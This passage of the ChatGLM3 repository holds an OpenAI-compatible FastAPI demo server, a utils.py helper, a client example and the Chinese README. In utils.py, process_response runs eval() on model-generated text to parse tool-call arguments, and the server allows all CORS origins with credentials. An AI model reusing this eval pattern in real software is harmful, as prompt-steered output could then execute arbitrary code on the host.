for a 6b model would result in an error due to the model's inability to output that many tokens after accounting for the history and prompt tokens. - Stream Handling and Custom Functions: Manages streaming responses and custom function calls within chat responses. - Pydantic Models: Defines structured models for requests and responses, enhancing API documentation and type safety. - Main Execution: Initializes the model and tokenizer, and starts the FastAPI app on the designated host and port. Note: This script doesn't include the setup for special tokens or multi-GPU support by default. Users need to configure their special tokens and can enable multi-GPU support as per the provided instructions. Embedding Models only support in One GPU. Running this script requires 14-15GB of GPU memory. 2 GB for the embedding model and 12-13 GB for the FP16 ChatGLM3 LLM. """ import os import time import tiktoken import torch import uvicorn from fastapi import FastAPI, HTTPException, Response from fastapi.middleware.cors import CORSMiddleware from contextlib import asynccontextmanager from typing import List, Literal, Optional, Union from loguru import logger from pydantic import BaseModel, Field from transformers import AutoTokenizer, AutoModel from utils import process_response, generate_chatglm3, generate_stream_chatglm3 from sentence_transformers import SentenceTransformer from sse_starlette.sse import EventSourceResponse # Set up limit request time EventSourceResponse.DEFAULT_PING_INTERVAL = 1000 # set LLM path MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') TOKENIZER_PATH = os.environ.get("TOKENIZER_PATH", MODEL_PATH) # set Embedding Model path EMBEDDING_PATH = os.environ.get('EMBEDDING_PATH', 'BAAI/bge-m3') @asynccontextmanager async def lifespan(app: FastAPI): yield if torch.cuda.is_available(): torch.cuda.empty_cache() torch.cuda.ipc_collect() app = FastAPI(lifespan=lifespan) app.add_middleware( CORSMiddleware, allow_origins=["*"], allow_credentials=True, allow_methods=["*"], allow_headers=["*"], ) class ModelCard(BaseModel): id: str object: str = "model" created: int = Field(default_factory=lambda: int(time.time())) owned_by: str = "owner" root: Optional[str] = None parent: Optional[str] = None permission: Optional[list] = None class ModelList(BaseModel): object: str = "list" data: List[ModelCard] = [] class FunctionCallResponse(BaseModel): name: Optional[str] = None arguments: Optional[str] = None class ChatMessage(BaseModel): role: Literal["user", "assistant", "system", "function"] content: str = None name: Optional[str] = None function_call: Optional[FunctionCallResponse] = None class DeltaMessage(BaseModel): role: Optional[Literal["user", "assistant", "system"]] = None content: Optional[str] = None function_call: Optional[FunctionCallResponse] = None ## for Embedding class EmbeddingRequest(BaseModel): input: Union[List[str], str] model: str class CompletionUsage(BaseModel): prompt_tokens: int completion_tokens: int total_tokens: int class EmbeddingResponse(BaseModel): data: list model: str object: str usage: CompletionUsage # for ChatCompletionRequest class UsageInfo(BaseModel): prompt_tokens: int = 0 total_tokens: int = 0 completion_tokens: Optional[int] = 0 class ChatCompletionRequest(BaseModel): model: str messages: List[ChatMessage] temperature: Optional[float] = 0.8 top_p: Optional[float] = 0.8 max_tokens: Optional[int] = None stream: Optional[bool] = False tools: Optional[Union[dict, List[dict]]] = None repetition_penalty: Optional[float] = 1.1 class ChatCompletionResponseChoice(BaseModel): index: int message: ChatMessage finish_reason: Literal["stop", "length", "function_call"] class ChatCompletionResponseStreamChoice(BaseModel): delta: DeltaMessage finish_reason: Optional[Literal["stop", "length", "function_call"]] index: int class ChatCompletionResponse(BaseModel): model: str id: str object: Literal["chat.completion", "chat.completion.chunk"] choices: List[Union[ChatCompletionResponseChoice, ChatCompletionResponseStreamChoice]] created: Optional[int] = Field(default_factory=lambda: int(time.time())) usage: Optional[UsageInfo] = None @app.get("/health") async def health() -> Response: """Health check.""" return Response(status_code=200) @app.post("/v1/embeddings", response_model=EmbeddingResponse) async def get_embeddings(request: EmbeddingRequest): if isinstance(request.input, str): embeddings = [embedding_model.encode(request.input)] else: embeddings = [embedding_model.encode(text) for text in request.input] embeddings = [embedding.tolist() for embedding in embeddings] def num_tokens_from_string(string: str) -> int: """ Returns the number of tokens in a text string. use cl100k_base tokenizer """ encoding = tiktoken.get_encoding('cl100k_base') num_tokens = len(encoding.encode(string)) return num_tokens response = { "data": [ { "object": "embedding", "embedding": embedding, "index": index } for index, embedding in enumerate(embeddings) ], "model": request.model, "object": "list", "usage": CompletionUsage( prompt_tokens=sum(len(text.split()) for text in request.input), completion_tokens=0, total_tokens=sum(num_tokens_from_string(text) for text in request.input), ) } return response @app.get("/v1/models", response_model=ModelList) async def list_models(): model_card = ModelCard( id="chatglm3-6b" ) return ModelList( data=[model_card] ) @app.post("/v1/chat/completions", response_model=ChatCompletionResponse) async def create_chat_completion(request: ChatCompletionRequest): global model, tokenizer if len(request.messages) < 1 or request.messages[-1].role == "assistant": raise HTTPException(status_code=400, detail="Invalid request") gen_params = dict( messages=request.messages, temperature=request.temperature, top_p=request.top_p, max_tokens=request.max_tokens or 1024, echo=False, stream=request.stream, repetition_penalty=request.repetition_penalty, tools=request.tools, ) logger.debug(f"==== request ====\n{gen_params}") if request.stream: # Use the stream mode to read the first few characters, if it is not a function call, direct stram output predict_stream_generator = predict_stream(request.model, gen_params) output = next(predict_stream_generator) if not contains_custom_function(output): return EventSourceResponse(predict_stream_generator, media_type="text/event-stream") # Obtain the result directly at one time and determine whether tools needs to be called. logger.debug(f"First result output:\n{output}") function_call = None if output and request.tools: try: function_call = process_response(output, use_tool=True) except: logger.warning("Failed to parse tool call") # CallFunction if isinstance(function_call, dict): function_call = FunctionCallResponse(**function_call) """ In this demo, we did not register any tools. You can use the tools that have been implemented in our `tools_using_demo` and implement your own streaming tool implementation here. Similar to the following method: function_args = json.loads(function_call.arguments) tool_response = dispatch_tool(tool_name: str, tool_params: dict) """ tool_response = "" if not gen_params.get("messages"): gen_params["messages"] = [] gen_params["messages"].append(ChatMessage( role="assistant", content=output, )) gen_params["messages"].append(ChatMessage( role="function", name=function_call.name, content=tool_response, )) # Streaming output of results after function calls generate = predict(request.model, gen_params) return EventSourceResponse(generate, media_type="text/event-stream") else: # Handled to avoid exceptions in the above parsing function process. generate = parse_output_text(request.model, output) return EventSourceResponse(generate, media_type="text/event-stream") # Here is the handling of stream = False response = generate_chatglm3(model, tokenizer, gen_params) # Remove the first newline character if response["text"].startswith("\n"): response["text"] = response["text"][1:] response["text"] = response["text"].strip() usage = UsageInfo() function_call, finish_reason = None, "stop" if request.tools: try: function_call = process_response(response["text"], use_tool=True) except: logger.warning("Failed to parse tool call, maybe the response is not a tool call or have been answered.") if isinstance(function_call, dict): finish_reason = "function_call" function_call = FunctionCallResponse(**function_call) message = ChatMessage( role="assistant", content=response["text"], function_call=function_call if isinstance(function_call, FunctionCallResponse) else None, ) logger.debug(f"==== message ====\n{message}") choice_data = ChatCompletionResponseChoice( index=0, message=message, finish_reason=finish_reason, ) task_usage = UsageInfo.model_validate(response["usage"]) for usage_key, usage_value in task_usage.model_dump().items(): setattr(usage, usage_key, getattr(usage, usage_key) + usage_value) return ChatCompletionResponse( model=request.model, id="", # for open_source model, id is empty choices=[choice_data], object="chat.completion", usage=usage ) async def predict(model_id: str, params: dict): global model, tokenizer choice_data = ChatCompletionResponseStreamChoice( index=0, delta=DeltaMessage(role="assistant"), finish_reason=None ) chunk = ChatCompletionResponse(model=model_id, id="", choices=[choice_data], object="chat.completion.chunk") yield "{}".format(chunk.model_dump_json(exclude_unset=True)) previous_text = "" for new_response in generate_stream_chatglm3(model, tokenizer, params): decoded_unicode = new_response["text"] delta_text = decoded_unicode[len(previous_text):] previous_text = decoded_unicode finish_reason = new_response["finish_reason"] if len(delta_text) == 0 and finish_reason != "function_call": continue function_call = None if finish_reason == "function_call": try: function_call = process_response(decoded_unicode, use_tool=True) except: logger.warning( "Failed to parse tool call, maybe the response is not a tool call or have been answered.") if isinstance(function_call, dict): function_call = FunctionCallResponse(**function_call) delta = DeltaMessage( content=delta_text, role="assistant", function_call=function_call if isinstance(function_call, FunctionCallResponse) else None, ) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=delta, finish_reason=finish_reason ) chunk = ChatCompletionResponse( model=model_id, id="", choices=[choice_data], object="chat.completion.chunk" ) yield "{}".format(chunk.model_dump_json(exclude_unset=True)) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=DeltaMessage(), finish_reason="stop" ) chunk = ChatCompletionResponse( model=model_id, id="", choices=[choice_data], object="chat.completion.chunk" ) yield "{}".format(chunk.model_dump_json(exclude_unset=True)) yield '[DONE]' def predict_stream(model_id, gen_params): """ The function call is compatible with stream mode output. The first seven characters are determined. If not a function call, the stream output is directly generated. Otherwise, the complete character content of the function call is returned. :param model_id: :param gen_params: :return: """ output = "" is_function_call = False has_send_first_chunk = False for new_response in generate_stream_chatglm3(model, tokenizer, gen_params): decoded_unicode = new_response["text"] delta_text = decoded_unicode[len(output):] output = decoded_unicode # When it is not a function call and the character length is> 7, # try to judge whether it is a function call according to the special function prefix if not is_function_call and len(output) > 7: # Determine whether a function is called is_function_call = contains_custom_function(output) if is_function_call: continue # Non-function call, direct stream output finish_reason = new_response["finish_reason"] # Send an empty string first to avoid truncation by subsequent next() operations. if not has_send_first_chunk: message = DeltaMessage( content="", role="assistant", function_call=None, ) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=message, finish_reason=finish_reason ) chunk = ChatCompletionResponse( model=model_id, id="", choices=[choice_data], created=int(time.time()), object="chat.completion.chunk" ) yield "{}".format(chunk.model_dump_json(exclude_unset=True)) send_msg = delta_text if has_send_first_chunk else output has_send_first_chunk = True message = DeltaMessage( content=send_msg, role="assistant", function_call=None, ) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=message, finish_reason=finish_reason ) chunk = ChatCompletionResponse( model=model_id, id="", choices=[choice_data], created=int(time.time()), object="chat.completion.chunk" ) yield "{}".format(chunk.model_dump_json(exclude_unset=True)) if is_function_call: yield output else: yield '[DONE]' async def parse_output_text(model_id: str, value: str): """ Directly output the text content of value :param model_id: :param value: :return: """ choice_data = ChatCompletionResponseStreamChoice( index=0, delta=DeltaMessage(role="assistant", content=value), finish_reason=None ) chunk = ChatCompletionResponse(model=model_id, id="", choices=[choice_data], object="chat.completion.chunk") yield "{}".format(chunk.model_dump_json(exclude_unset=True)) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=DeltaMessage(), finish_reason="stop" ) chunk = ChatCompletionResponse(model=model_id, id="", choices=[choice_data], object="chat.completion.chunk") yield "{}".format(chunk.model_dump_json(exclude_unset=True)) yield '[DONE]' def contains_custom_function(value: str) -> bool: """ Determine whether 'function_call' according to a special function prefix. For example, the functions defined in "tools_using_demo/tool_register.py" are all "get_xxx" and start with "get_" [Note] This is not a rigorous judgment method, only for reference. :param value: :return: """ return value and 'get_' in value if __name__ == "__main__": # Load LLM tokenizer = AutoTokenizer.from_pretrained(TOKENIZER_PATH, trust_remote_code=True) model = AutoModel.from_pretrained(MODEL_PATH, trust_remote_code=True, device_map="auto").eval() # load Embedding embedding_model = SentenceTransformer(EMBEDDING_PATH, device="cuda") uvicorn.run(app, host='0.0.0.0', port=8000, workers=1) File: openai_api_demo/utils.py import gc import json import torch from transformers import PreTrainedModel, PreTrainedTokenizer from transformers.generation.logits_process import LogitsProcessor from typing import Union, Tuple class InvalidScoreLogitsProcessor(LogitsProcessor): def __call__( self, input_ids: torch.LongTensor, scores: torch.FloatTensor ) -> torch.FloatTensor: if torch.isnan(scores).any() or torch.isinf(scores).any(): scores.zero_() scores[..., 5] = 5e4 return scores def process_response(output: str, use_tool: bool = False) -> Union[str, dict]: content = "" for response in output.split("<|assistant|>"): metadata, content = response.split("\n", maxsplit=1) if not metadata.strip(): content = content.strip() content = content.replace("[[训练时间]]", "2023年") else: if use_tool: content = "\n".join(content.split("\n")[1:-1]) def tool_call(**kwargs): return kwargs parameters = eval(content) content = { "name": metadata.strip(), "arguments": json.dumps(parameters, ensure_ascii=False) } else: content = { "name": metadata.strip(), "content": content } return content @torch.inference_mode() def generate_stream_chatglm3(model: PreTrainedModel, tokenizer: PreTrainedTokenizer, params: dict): messages = params["messages"] tools = params["tools"] temperature = float(params.get("temperature", 1.0)) repetition_penalty = float(params.get("repetition_penalty", 1.0)) top_p = float(params.get("top_p", 1.0)) max_new_tokens = int(params.get("max_tokens", 256)) echo = params.get("echo", True) messages = process_chatglm_messages(messages, tools=tools) query, role = messages[-1]["content"], messages[-1]["role"] inputs = tokenizer.build_chat_input(query, history=messages[:-1], role=role) inputs = inputs.to(model.device) input_echo_len = len(inputs["input_ids"][0]) if input_echo_len >= model.config.seq_length: print(f"Input length larger than {model.config.seq_length}") eos_token_id = [ tokenizer.eos_token_id, tokenizer.get_command("<|user|>"), tokenizer.get_command("<|observation|>") ] gen_kwargs = { "max_new_tokens": max_new_tokens, "do_sample": True if temperature > 1e-5 else False, "top_p": top_p, "repetition_penalty": repetition_penalty, "logits_processor": [InvalidScoreLogitsProcessor()], } if temperature > 1e-5: gen_kwargs["temperature"] = temperature total_len = 0 for total_ids in model.stream_generate(**inputs, eos_token_id=eos_token_id, **gen_kwargs): total_ids = total_ids.tolist()[0] total_len = len(total_ids) if echo: output_ids = total_ids[:-1] else: output_ids = total_ids[input_echo_len:-1] response = tokenizer.decode(output_ids) if response and response[-1] != "�": response, stop_found = apply_stopping_strings(response, ["<|observation|>"]) yield { "text": response, "usage": { "prompt_tokens": input_echo_len, "completion_tokens": total_len - input_echo_len, "total_tokens": total_len, }, "finish_reason": "function_call" if stop_found else None, } if stop_found: break # Only last stream result contains finish_reason, we set finish_reason as stop ret = { "text": response, "usage": { "prompt_tokens": input_echo_len, "completion_tokens": total_len - input_echo_len, "total_tokens": total_len, }, "finish_reason": "stop", } yield ret gc.collect() torch.cuda.empty_cache() def process_chatglm_messages(messages, tools=None): _messages = messages messages = [] msg_has_sys = False if tools: messages.append( { "role": "system", "content": "Answer the following questions as best as you can. You have access to the following tools:", "tools": tools } ) msg_has_sys = True for m in _messages: role, content, func_call = m.role, m.content, m.function_call if role == "function": messages.append( { "role": "observation", "content": content } ) elif role == "assistant" and func_call is not None: for response in content.split("<|assistant|>"): metadata, sub_content = response.split("\n", maxsplit=1) messages.append( { "role": role, "metadata": metadata, "content": sub_content.strip() } ) else: if role == "system" and msg_has_sys: msg_has_sys = False continue messages.append({"role": role, "content": content}) return messages def generate_chatglm3(model: PreTrainedModel, tokenizer: PreTrainedTokenizer, params: dict): for response in generate_stream_chatglm3(model, tokenizer, params): pass return response def apply_stopping_strings(reply, stop_strings) -> Tuple[str, bool]: stop_found = False for string in stop_strings: idx = reply.find(string) if idx != -1: reply = reply[:idx] stop_found = True break if not stop_found: # If something like "\nYo" is generated just before "\nYou: is completed, trim it for string in stop_strings: for j in range(len(string) - 1, 0, -1): if reply[-j:] == string[:j]: reply = reply[:-j] break else: continue break return reply, stop_found File: openai_api_demo/openai_api_request.py """ This script is an example of using the OpenAI API to create various interactions with a ChatGLM3 model. It includes functions to: 1. Conduct a basic chat session, asking about weather conditions in multiple cities. 2. Initiate a simple chat in Chinese, asking the model to tell a short story. 3. Retrieve and print embeddings for a given text input. Each function demonstrates a different aspect of the API's capabilities, showcasing how to make requests and handle responses. """ from openai import OpenAI base_url = "http://127.0.0.1:8000/v1/" client = OpenAI(api_key="EMPTY", base_url=base_url) def function_chat(): messages = [{"role": "user", "content": "What's the weather like in San Francisco, Tokyo, and Paris?"}] tools = [ { "type": "function", "function": { "name": "get_current_weather", "description": "Get the current weather in a given location", "parameters": { "type": "object", "properties": { "location": { "type": "string", "description": "The city and state, e.g. San Francisco, CA", }, "unit": {"type": "string", "enum": ["celsius", "fahrenheit"]}, }, "required": ["location"], }, }, } ] response = client.chat.completions.create( model="chatglm3-6b", messages=messages, tools=tools, tool_choice="auto", ) if response: content = response.choices[0].message.content print(content) else: print("Error:", response.status_code) def simple_chat(use_stream=True): messages = [ { "role": "system", "content": "You are ChatGLM3, a large language model trained by Zhipu.AI. Follow the user's " "instructions carefully. Respond using markdown.", }, { "role": "user", "content": "你好,请你用生动的话语给我讲一个小故事吧" } ] response = client.chat.completions.create( model="chatglm3-6b", messages=messages, stream=use_stream, max_tokens=256, temperature=0.8, presence_penalty=1.1, top_p=0.8) if response: if use_stream: for chunk in response: print(chunk.choices[0].delta.content) else: content = response.choices[0].message.content print(content) else: print("Error:", response.status_code) def embedding(): response = client.embeddings.create( model="bge-large-zh-1.5", input=["你好,给我讲一个故事,大概100字"], ) embeddings = response.data[0].embedding print("嵌入完成,维度:", len(embeddings)) if __name__ == "__main__": simple_chat(use_stream=False) simple_chat(use_stream=True) embedding() function_chat()
# ChatGLM3 <p align="center"> 📄<a href="https://arxiv.org/pdf/2406.12793" target="_blank"> Report </a> • 🤗 <a href="https://huggingface.co/THUDM/chatglm3-6b" target="_blank">HF Repo</a> • 🤖 <a href="https://modelscope.cn/models/ZhipuAI/chatglm3-6b" target="_blank">ModelScope</a> • 🟣 <a href="https://www.wisemodel.cn/models/ZhipuAI/chatglm3-6b" target="_blank">WiseModel</a> • 📔 <a href="https://lslfd0slxc.feishu.cn/wiki/WvQbwIJ9tiPAxGk8ywDck6yfnof" target="_blank">Document</a> • 🧰 <a href="https://openxlab.org.cn/models/hot/THUDM" target="_blank">OpenXLab</a> • 🐦 <a href="https://twitter.com/thukeg" target="_blank">Twitter</a><br> </p> <p align="center"> 👋 加入我们的 <a href="https://discord.gg/fK2dz4bg" target="_blank">Discord</a> 和 <a href="resources/WECHAT.md" target="_blank">微信</a> </p> <p align="center"> 📍在 <a href="https://www.chatglm.cn">chatglm.cn</a> 体验更大规模的 ChatGLM 模型。 </p> [Read this in English.](./README_en.md) 📔 关于`ChatGLM3-6B` 更为详细的使用信息,可以参考 + [ChatGLM3 开放技术文档](https://lslfd0slxc.feishu.cn/wiki/WvQbwIJ9tiPAxGk8ywDck6yfnof?from=from_copylink) + [Bilibili video](https://www.bilibili.com/video/BV1uC4y1J7yA) + [YouTube video](https://www.youtube.com/watch?v=Pw9PB6R7ORA) ## GLM-4 开源模型和API 我们已经发布最新的 **GLM-4** 模型,该模型在多个指标上有了新的突破,您可以在以下两个渠道体验我们的最新模型。 + [GLM-4 开源模型](https://github.com/THUDM/GLM-4) 我们已经开源了 GLM-4-9B 系列模型,在各项指标的测试上有明显提升,欢迎尝试。 + [智谱清言](https://chatglm.cn/main/detail?fr=ecology_x) 体验最新版 GLM-4,包括 **GLMs,All tools**等功能。 + [API平台](https://open.bigmodel.cn/?utm_campaign=open&_channel_track_key=OWTVNma9) 新一代 API 平台已经上线,您可以直接在 API 平台上体验 `GLM-4-0520`、`GLM-4-air`、`GLM-4-airx`、`GLM-4-flash`、`GLM-4`、`GLM-3-Turbo`、`CharacterGLM-3`,`CogView-3` 等新模型。 其中`GLM-4`、`GLM-3-Turbo`两个模型支持了 `System Prompt`、`Function Call`、 `Retrieval`、`Web_Search`等新功能,欢迎体验。 + [GLM-4 API 开源教程](https://github.com/MetaGLM/glm-cookbook/) GLM-4 API教程和基础应用,欢迎尝试。 API相关问题可以在本开源教程疑问,或者使用 [GLM-4 API AI助手](https://open.bigmodel.cn/shareapp/v1/?share_code=sQwt5qyqYVaNh1O_87p8O) 来获得常见问题的帮助。 ----- ## ChatGLM3 介绍 **ChatGLM3** 是智谱AI和清华大学 KEG 实验室联合发布的对话预训练模型。ChatGLM3-6B 是 ChatGLM3 系列中的开源模型,在保留了前两代模型对话流畅、部署门槛低等众多优秀特性的基础上,ChatGLM3-6B 引入了如下特性: 1. **更强大的基础模型:** ChatGLM3-6B 的基础模型 ChatGLM3-6B-Base 采用了更多样的训练数据、更充分的训练步数和更合理的训练策略。在语义、数学、推理、代码、知识等不同角度的数据集上测评显示,* *ChatGLM3-6B-Base 具有在 10B 以下的基础模型中最强的性能**。 2. **更完整的功能支持:** ChatGLM3-6B 采用了全新设计的 [Prompt 格式](PROMPT.md) ,除正常的多轮对话外。同时原生支持[工具调用](tools_using_demo/README.md)(Function Call)、代码执行(Code Interpreter)和 Agent 任务等复杂场景。 3. **更全面的开源序列:** 除了对话模型 [ChatGLM3-6B](https://huggingface.co/THUDM/chatglm3-6b) 外,还开源了基础模型 [ChatGLM3-6B-Base](https://huggingface.co/THUDM/chatglm3-6b-base) 、长文本对话模型 [ChatGLM3-6B-32K](https://huggingface.co/THUDM/chatglm3-6b-32k) 和进一步强化了对于长文本理解能力的 [ChatGLM3-6B-128K](https://huggingface.co/THUDM/chatglm3-6b-128k)。以上所有权重对学术研究**完全开放** ,在填写 [问卷](https://open.bigmodel.cn/mla/form) 进行登记后**亦允许免费商业使用**。 ----- ChatGLM3 开源模型旨在与开源社区一起推动大模型技术发展,恳请开发者和大家遵守 [开源协议](MODEL_LICENSE) ,勿将开源模型和代码及基于开源项目产生的衍生物用于任何可能给国家和社会带来危害的用途以及用于任何未经过安全评估和备案的服务。目前,本项目团队未基于 **ChatGLM3 开源模型**开发任何应用,包括网页端、安卓、苹果 iOS 及 Windows App 等应用。 尽管模型在训练的各个阶段都尽力确保数据的合规性和准确性,但由于 ChatGLM3-6B 模型规模较小,且模型受概率随机性因素影响,无法保证输出内容的准确。同时模型的输出容易被用户的输入误导。* *本项目不承担开源模型和代码导致的数据安全、舆情风险或发生任何模型被误导、滥用、传播、不当利用而产生的风险和责任。** ## 模型列表 | Model | Seq Length | Download | |:----------------:|:----------:|:----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:| | ChatGLM3-6B | 8k | [HuggingFace](https://huggingface.co/THUDM/chatglm3-6b) \| [ModelScope](https://modelscope.cn/models/ZhipuAI/chatglm3-6b) \| [WiseModel](https://www.wisemodel.cn/models/ZhipuAI/chatglm3-6b) \| [OpenXLab](https://openxlab.org.cn/models/detail/THUDM/chatglm3-6b) | | ChatGLM3-6B-Base | 8k | [HuggingFace](https://huggingface.co/THUDM/chatglm3-6b-base) \| [ModelScope](https://modelscope.cn/models/ZhipuAI/chatglm3-6b-base) \| [WiseModel](https://www.wisemodel.cn/models/ZhipuAI/chatglm3-6b-base) \| [OpenXLabl](https://openxlab.org.cn/models/detail/THUDM/chatglm3-6b-base)| | ChatGLM3-6B-32K | 32k | [HuggingFace](https://huggingface.co/THUDM/chatglm3-6b-32k) \| [ModelScope](https://modelscope.cn/models/ZhipuAI/chatglm3-6b-32k) \| [WiseModel](https://www.wisemodel.cn/models/ZhipuAI/chatglm3-6b-32k) \| [OpenXLab](https://openxlab.org.cn/models/detail/THUDM/chatglm3-6b-32k) | | ChatGLM3-6B-128K | 128k | [HuggingFace](https://huggingface.co/THUDM/chatglm3-6b-128k) | [ModelScope](https://modelscope.cn/models/ZhipuAI/chatglm3-6b-128k)\| [OpenXLab](https://openxlab.org.cn/models/detail/THUDM/chatglm3-6b-128k) | <br> 请注意,所有模型的最新更新都会在 Huggingface 率先发布。 ModelScope 和 WiseModel 由于没有与 Huggingface 同步,需要开发人员手动更新,可能会在 Huggingface 更新后一段时间内同步更新。 ## 友情链接 以下优秀开源仓库已经对 ChatGLM3-6B 模型深度支持,欢迎大家扩展学习。 推理加速: * [chatglm.cpp](https://github.com/li-plus/chatglm.cpp): 类似 llama.cpp 的量化加速推理方案,实现笔记本上实时对话 * [ChatGLM3-TPU](https://github.com/sophgo/ChatGLM3-TPU): 采用TPU加速推理方案,在算能端侧芯片BM1684X(16T@FP16,内存16G)上实时运行约7.5 token/s * [TensorRT-LLM](https://github.com/NVIDIA/TensorRT-LLM/tree/main): NVIDIA开发的高性能 GPU 加速推理方案,可以参考此 [步骤](./tensorrt_llm_demo/README.md) 部署 ChatGLM3-6B 模型 * [OpenVINO](https://github.com/openvinotoolkit): Intel 开发的高性能 CPU 和 GPU 加速推理方案,可以参考此 [步骤](./Intel_device_demo/openvino_demo/README.md) 部署 ChatGLM3-6B 模型 高效微调: * [LLaMA-Factory](https://github.com/hiyouga/LLaMA-Factory): 优秀易上手的高效微调框架。 应用框架: * [LangChain-Chatchat](https://github.com/chatchat-space/Langchain-Chatchat): 基于 ChatGLM 等大语言模型与 Langchain 等应用框架实现,开源、可离线部署的检索增强生成(RAG)大模型知识库项目。 * [BISHENG](https://github.com/dataelement/bisheng): 开源大模型应用开发平台,赋能和加速大模型应用开发落地,帮助用户以最佳体验进入下一代应用开发模式。 * [RAGFlow](https://github.com/infiniflow/ragflow): RAGFlow 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。可为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。 ## 评测结果 ### 典型任务 我们选取了 8 个中英文典型数据集,在 ChatGLM3-6B (base) 版本上进行了性能测试。 | Model | GSM8K | MATH | BBH | MMLU | C-Eval | CMMLU | MBPP | AGIEval | |------------------|:-----:|:----:|:----:|:----:|:------:|:-----:|:----:|:-------:| | ChatGLM2-6B-Base | 32.4 | 6.5 | 33.7 | 47.9 | 51.7 | 50.0 | - | - | | Best Baseline | 52.1 | 13.1 | 45.0 | 60.1 | 63.5 | 62.2 | 47.5 | 45.8 | | ChatGLM3-6B-Base | 72.3 | 25.7 | 66.1 | 61.4 | 69.0 | 67.5 | 52.4 | 53.7 | > Best Baseline 指的是截止 2023年10月27日、模型参数在 10B 以下、在对应数据集上表现最好的预训练模型,不包括只针对某一项任务训练而未保持通用能力的模型。 > 对 ChatGLM3-6B-Base 的测试中,BBH 采用 3-shot 测试,需要推理的 GSM8K、MATH 采用 0-shot CoT 测试,MBPP 采用 0-shot > 生成后运行测例计算 Pass@1 ,其他选择题类型数据集均采用 0-shot 测试。 我们在多个长文本应用场景下对 ChatGLM3-6B-32K 进行了人工评估测试。与二代模型相比,其效果平均提升了超过 50%。在论文阅读、文档摘要和财报分析等应用中,这种提升尤为显著。此外,我们还在 LongBench 评测集上对模型进行了测试,具体结果如下表所示 | Model | 平均 | Summary | Single-Doc QA | Multi-Doc QA | Code | Few-shot | Synthetic | |-----------------|:----:|:-------:|:-------------:|:------------:|:----:|:--------:|:---------:| | ChatGLM2-6B-32K | 41.5 | 24.8 | 37.6 | 34.7 | 52.8 | 51.3 | 47.7 | | ChatGLM3-6B-32K | 50.2 | 26.6 | 45.8 | 46.1 | 56.2 | 61.2 | 65 | ## 使用方式 ### 环境安装 首先需要下载本仓库: ```shell git clone https://github.com/THUDM/ChatGLM3 cd ChatGLM3 ``` 然后使用 pip 安装依赖: ``` pip install -r requirements.txt ``` + 为了保证 `torch` 的版本正确,请严格按照 [官方文档](https://pytorch.org/get-started/locally/) 的说明安装。 ### 综合 Demo 我们提供了一个集成以下三种功能的综合 Demo,运行方法请参考[综合 Demo](composite_demo/README.md) - Chat: 对话模式,在此模式下可以与模型进行对话。 - Tool: 工具模式,模型除了对话外,还可以通过工具进行其他操作。 <img src="resources/tool.png" width="400"> - Code Interpreter: 代码解释器模式,模型可以在一个 Jupyter 环境中执行代码并获取结果,以完成复杂任务。 <img src="resources/heart.png" width="400"> ### 代码调用 可以通过如下代码调用 ChatGLM 模型来生成对话: ``` >> from transformers import AutoTokenizer, AutoModel >> tokenizer = AutoTokenizer.from_pretrained("THUDM/chatglm3-6b", trust_remote_code=True) >> model = AutoModel.from_pretrained("THUDM/chatglm3-6b", trust_remote_code=True, device='cuda') >> model = model.eval() >> response, history = model.chat(tokenizer, "你好", history=[]) >> print(response) 你好👋!我是人工智能助手 ChatGLM3 - 6B, 很高兴见到你, 欢迎问我任何问题。 >> response, history = model.chat(tokenizer, "晚上睡不着应该怎么办", history=history) >> print(response) 晚上睡不着可能会让你感到焦虑或不舒服, 但以下是一些可以帮助你入睡的方法: 1.制定规律的睡眠时间表: 保持规律的睡眠时间表可以帮助你建立健康的睡眠习惯, 使你更容易入睡。尽量在每天的相同时间上床, 并在同一时间起床。 2.创造一个舒适的睡眠环境: 确保睡眠环境舒适, 安静, 黑暗且温度适宜。可以使用舒适的床上用品, 并保持房间通风。 3.放松身心: 在睡前做些放松的活动, 例如泡个热水澡, 听些轻柔的音乐, 阅读一些有趣的书籍等, 有助于缓解紧张和焦虑, 使你更容易入睡。 4.避免饮用含有咖啡因的饮料: 咖啡因是一种刺激性物质, 会影响你的睡眠质量。尽量避免在睡前饮用含有咖啡因的饮料, 例如咖啡, 茶和可乐。 5.避免在床上做与睡眠无关的事情: 在床上做些与睡眠无关的事情, 例如看电影, 玩游戏或工作等, 可能会干扰你的睡眠。 6.尝试呼吸技巧: 深呼吸是一种放松技巧, 可以帮助你缓解紧张和焦虑, 使你更容易入睡。试着慢慢吸气, 保持几秒钟, 然后缓慢呼气。 如果这些方法无法帮助你入睡, 你可以考虑咨询医生或睡眠专家, 寻求进一步的建议。 ``` #### 从本地加载模型 以上代码会由 `transformers` 自动下载模型实现和参数。完整的模型实现在 [Hugging Face Hub](https://huggingface.co/THUDM/chatglm3-6b) 。如果你的网络环境较差,下载模型参数可能会花费较长时间甚至失败。此时可以先将模型下载到本地,然后从本地加载。 从 Hugging Face Hub 下载模型需要先[安装Git LFS](https://docs.github.com/zh/repositories/working-with-files/managing-large-files/installing-git-large-file-storage) ,然后运行 ```Shell git clone https://huggingface.co/THUDM/chatglm3-6b ``` 如果从你从 HuggingFace 下载比较慢,也可以从 [ModelScope](https://modelscope.cn/models/ZhipuAI/chatglm3-6b) 中下载。 ### 模型微调 我们提供了一个微调 ChatGLM3-6B 模型的基础套件,可以用来微调 ChatGLM3-6B 模型。微调套件的使用方法请参考 [微调套件](finetune_demo/README.md)。 ### 网页版对话 Demo ![web-demo](resources/web-demo.gif) 可以通过以下命令启动基于 Gradio 的网页版 demo: ```shell python web_demo_gradio.py ``` ![web-demo](resources/web-demo2.png) 可以通过以下命令启动基于 Streamlit 的网页版 demo: ```shell streamlit run web_demo_streamlit.py ``` 网页版 demo 会运行一个 Web Server,并输出地址。在浏览器中打开输出的地址即可使用。 经测试,基于 Streamlit 的网页版 Demo 会更流畅。 ### 命令行对话 Demo ![cli-demo](resources/cli-demo.png) 运行仓库中 [cli_demo.py](basic_demo/cli_demo.py): ```shell python cli_demo.py ``` 